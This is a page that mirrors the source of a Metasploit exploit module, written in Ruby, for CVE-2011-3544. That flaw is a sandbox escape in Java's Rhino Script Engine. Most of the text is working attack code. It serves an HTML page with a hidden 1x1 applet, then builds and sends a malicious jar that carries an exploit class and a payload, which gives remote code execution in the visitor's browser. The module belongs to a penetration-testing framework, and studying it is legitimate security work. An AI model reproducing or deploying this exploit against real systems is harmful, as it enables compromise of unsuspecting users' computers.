Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/browser/java_rhino.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::HttpServer::HTML
10
11
include Msf::Exploit::Remote::BrowserAutopwn
12
autopwn_info({ :javascript => false })
13
14
def initialize(info = {})
15
super(
16
update_info(
17
info,
18
'Name' => 'Java Applet Rhino Script Engine Remote Code Execution',
19
'Description' => %q{
20
This module exploits a vulnerability in the Rhino Script Engine that
21
can be used by a Java Applet to run arbitrary Java code outside of
22
the sandbox. The vulnerability affects version 7 and version 6 update
23
27 and earlier, and should work on any browser that supports Java
24
(for example: IE, Firefox, Google Chrome, etc)
25
},
26
'License' => MSF_LICENSE,
27
'Author' => [
28
'Michael Schierl', # Discovery
29
'juan vazquez', # metasploit module
30
'Edward D. Teach <teach[at]consortium-of-pwners.net>',
31
'sinn3r'
32
],
33
'References' => [
34
[ 'CVE', '2011-3544' ],
35
[ 'OSVDB', '76500' ],
36
[ 'ZDI', '11-305' ],
37
[ 'URL', 'http://schierlm.users.sourceforge.net/CVE-2011-3544.html' ],
38
],
39
'Platform' => %w{java linux win},
40
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
41
'Targets' => [
42
[
43
'Generic (Java Payload)',
44
{
45
'Arch' => ARCH_JAVA,
46
}
47
],
48
[
49
'Windows Universal',
50
{
51
'Arch' => ARCH_X86,
52
'Platform' => 'win'
53
}
54
],
55
[
56
'Apple OSX',
57
{
58
'ARCH' => ARCH_X86,
59
'Platform' => 'osx'
60
}
61
],
62
[
63
'Linux x86',
64
{
65
'Arch' => ARCH_X86,
66
'Platform' => 'linux'
67
}
68
]
69
],
70
'DefaultTarget' => 0,
71
'DisclosureDate' => '2011-10-18',
72
'Notes' => {
73
'Reliability' => UNKNOWN_RELIABILITY,
74
'Stability' => UNKNOWN_STABILITY,
75
'SideEffects' => UNKNOWN_SIDE_EFFECTS
76
}
77
)
78
)
79
end
80
81
def on_request_uri(cli, request)
82
if not request.uri.match(/\.jar$/i)
83
if not request.uri.match(/\/$/)
84
send_redirect(cli, get_resource() + '/', '')
85
return
86
end
87
88
print_status("#{self.name} handling request")
89
90
send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
91
return
92
end
93
94
paths = [
95
[ "Exploit.class" ]
96
]
97
98
p = regenerate_payload(cli)
99
100
jar = p.encoded_jar
101
paths.each do |path|
102
1.upto(path.length - 1) do |idx|
103
full = path[0, idx].join("/") + "/"
104
if !(jar.entries.map { |e| e.name }.include?(full))
105
jar.add_file(full, '')
106
end
107
end
108
fd = File.open(File.join(Msf::Config.data_directory, "exploits", "cve-2011-3544", path), "rb")
109
data = fd.read(fd.stat.size)
110
jar.add_file(path.join("/"), data)
111
fd.close
112
end
113
114
print_status("Sending Applet.jar")
115
send_response(cli, jar.pack, { 'Content-Type' => "application/octet-stream" })
116
117
handler(cli)
118
end
119
120
def generate_html
121
html = "<html><head></head>"
122
html += "<body>"
123
html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">"
124
html += "</applet></body></html>"
125
return html
126
end
127
end
128
129